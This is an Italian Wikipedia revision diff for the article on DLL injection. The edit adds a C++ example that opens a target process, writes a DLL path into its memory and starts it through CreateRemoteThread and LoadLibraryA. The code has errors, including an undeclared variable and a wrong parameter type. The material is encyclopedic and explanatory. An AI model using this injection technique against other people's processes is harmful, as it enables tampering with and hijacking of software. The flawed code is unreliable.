Versione delle 17:35, 22 mag 2017 modifica Horcrux (discussione \| contributi) Amministratori dell'interfaccia, Amministratori 168 854 modifiche m added Category:Thread usando HotCat ← Differenza precedente		Versione delle 20:04, 12 gen 2018 modifica annulla 2001:b07:645e:2f03:ddd4:9be1:46e:5e83 (discussione) Aggiunta sezione codice d'esempio Etichetta: Modifica visuale Differenza successiva →
Riga 24: -Windows crea il nuovo thread e chiama LoadLibraryA() nello "spazio del thread". LoadLibraryA viene chiamato nel nuovo thread quindi non può fare riferimento allo stack del nostro processo. Ecco perché abbiamo bisogno di allocare la stringa contenente il path alla dll nella memoria nel processo "vittima". A sua volta LoadLibraryA chiama la DllMain di "func.dll" contenente il codice da eseguire nello spazio di "msnmsgr.exe" == Codice di esempio == Di seguito è mostrato un codice di esempio nel quale si mostra un esempio di dll injection in c++<syntaxhighlight lang="c++"> //Libreria iostream input/Output #include <iostream> //Libreria windows.h #include <windows.h> #include <psapi.h> #include <tlhelp32.h> #include <string> using namespace std; //Prototipi //Funzione per iniettare la dll bool Inject(DWORD pId, char dllName); //Funzione per ottenere l'id del processo DWORD GetProcessByName(PCSTR name); //Funzione principale int main() { //Ottengo il nome del processo //cout << << endl; char nomeDll[40]; int idProcesso; cout << "Nome dll: "; cin >> nomeDll; cout << "Nome processo: "; cin >> nomeProc; idProcesso = GetProcessByName(nomeProc); if(Inject(idProcesso, nomeDll)) { cout << "Operazione andata a buon fine" << endl; } else { cout << "OOPS! c'e' stato un errore" << endl; } system("pause"); return 0; } //Funzione per iniettare la dll bool Inject(DWORD pId, char dllName) { //Apro il processo con tutti i permessi HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, pId); //Se sono riuscito ad aprire il processo... if(h) { cout << "Processo aperto correttamente" << endl; //Ottengo l'indirizzo della funzione LoadLibraryA LPVOID LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"); //Alloco uno spazio nella memoria del processo //Leggibile e scrivibile LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE); //Scrivo il path della DLL if(!WriteProcessMemory(h, dereercomp, dllName, strlen(dllName), NULL)) { cout << "Errore nello scrivere la memoria del processo!" << endl; return false; } else { cout << "Scrittura memoria del processo andata a buon fine" << endl; } //CreateRemoteThread() per creare un nuovo thread nel processo taget. //Questo nuovo thread chiama la funzione LoadLibraryA() //e per unico argomento un puntatore alla stringa allocata all'interno dello stack del nostro programma contenente il path alla nostra dll HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, dereercomp, 0, NULL); WaitForSingleObject(asdc, INFINITE); //Tolgo lo spazio allocato VirtualFreeEx(h, dereercomp, strlen(dllName), MEM_RELEASE); //Chiudo il thread CloseHandle(asdc); //Chiudo il processo CloseHandle(h); //Ritorno true perchè è andato tutto a buon fine return true; } return false; } //Funzione per trovare l'id del processo DWORD GetProcessByName(PCSTR name) { DWORD pid = 0; // Create toolhelp snapshot. HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process; ZeroMemory(&process, sizeof(process)); process.dwSize = sizeof(process); // Walkthrough all processes. if (Process32First(snapshot, &process)) { do { // Compare process.szExeFile based on format of name, i.e., trim file path // trim .exe if necessary, etc. if (string(process.szExeFile) == string(name)) { pid = process.th32ProcessID; break; } } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); return pid; } </syntaxhighlight> == Difesa ==

Dll injection: differenze tra le versioni